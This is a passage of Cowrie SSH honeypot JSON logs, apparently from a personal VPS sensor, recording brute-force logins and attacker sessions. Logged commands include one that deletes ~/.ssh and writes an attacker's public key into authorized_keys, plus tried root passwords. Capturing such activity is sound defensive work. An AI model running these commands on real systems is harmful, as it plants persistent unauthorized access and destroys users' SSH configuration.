cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:31:08.673718Z","src_ip":"212.227.125.160","session":"7f4a380fddc0"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T01:31:09.133919Z","src_ip":"212.227.125.160","session":"7f4a380fddc0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:10.244843Z","src_ip":"212.227.125.160","session":"7f4a380fddc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8224,"dst_ip":"1.2.3.4","dst_port":22,"session":"3594014335b3","protocol":"ssh","message":"New connection: 212.227.235.229:8224 (1.2.3.4:22) [session: 3594014335b3]","sensor":"my-vps","timestamp":"2025-08-28T01:31:14.282801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:31:14.283600Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:31:14.532180Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@321","message":"login attempt [root/admin@321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:31:15.527114Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:31:16.101347Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:31:16.102067Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:31:16.103267Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:16.353979Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:31:16.938807Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T01:31:16.939551Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T01:31:17.190320Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:17.191478Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1908,"dst_ip":"1.2.3.4","dst_port":22,"session":"0868c8917c7c","protocol":"ssh","message":"New connection: 212.227.235.229:1908 (1.2.3.4:22) [session: 0868c8917c7c]","sensor":"my-vps","timestamp":"2025-08-28T01:31:17.434878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:31:17.435724Z","src_ip":"212.227.235.229","session":"0868c8917c7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:31:17.683249Z","src_ip":"212.227.235.229","session":"0868c8917c7c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T01:31:18.712921Z","src_ip":"212.227.235.229","session":"0868c8917c7c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:19.962094Z","src_ip":"212.227.235.229","session":"0868c8917c7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19681,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2541e3609ef","protocol":"ssh","message":"New connection: 212.227.235.229:19681 (1.2.3.4:22) [session: b2541e3609ef]","sensor":"my-vps","timestamp":"2025-08-28T01:31:20.201765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:31:20.202806Z","src_ip":"212.227.235.229","session":"b2541e3609ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:31:20.446650Z","src_ip":"212.227.235.229","session":"b2541e3609ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:31:21.460064Z","src_ip":"212.227.235.229","session":"b2541e3609ef"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:21.705568Z","src_ip":"212.227.235.229","session":"b2541e3609ef"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:21.710228Z","src_ip":"212.227.235.229","session":"3594014335b3"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50612,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b37d6afa056","protocol":"ssh","message":"New connection: 194.233.79.134:50612 (1.2.3.4:22) [session: 1b37d6afa056]","sensor":"my-vps","timestamp":"2025-08-28T01:31:28.823634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:31:28.828132Z","src_ip":"194.233.79.134","session":"1b37d6afa056"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:31:29.830408Z","src_ip":"194.233.79.134","session":"1b37d6afa056"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:31:31.018832Z","src_ip":"194.233.79.134","session":"1b37d6afa056"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:32.921567Z","src_ip":"194.233.79.134","session":"1b37d6afa056"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25095,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d9ffaacf2f3","protocol":"ssh","message":"New connection: 212.227.235.229:25095 (1.2.3.4:22) [session: 2d9ffaacf2f3]","sensor":"my-vps","timestamp":"2025-08-28T01:31:45.446409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:31:46.039896Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:31:46.040566Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.login.success","username":"root","password":"06GkR09","message":"login attempt [root/06GkR09] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:31:48.754479Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:31:50.590380Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T01:31:50.591100Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:51.616932Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:52.211463Z","src_ip":"212.227.235.229","session":"2d9ffaacf2f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57480,"dst_ip":"1.2.3.4","dst_port":22,"session":"6067cb3abbf6","protocol":"ssh","message":"New connection: 212.227.235.229:57480 (1.2.3.4:22) [session: 6067cb3abbf6]","sensor":"my-vps","timestamp":"2025-08-28T01:31:58.806778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:31:58.807654Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:31:58.887569Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu.123456","message":"login attempt [root/ubuntu.123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.250959Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:31:59.509230Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.509958Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.510898Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.592072Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:31:59.838159Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.839051Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.921737Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:31:59.922605Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32888,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4a3f35c2a92","protocol":"ssh","message":"New connection: 212.227.235.229:32888 (1.2.3.4:22) [session: a4a3f35c2a92]","sensor":"my-vps","timestamp":"2025-08-28T01:32:00.001833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:32:00.002920Z","src_ip":"212.227.235.229","session":"a4a3f35c2a92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-e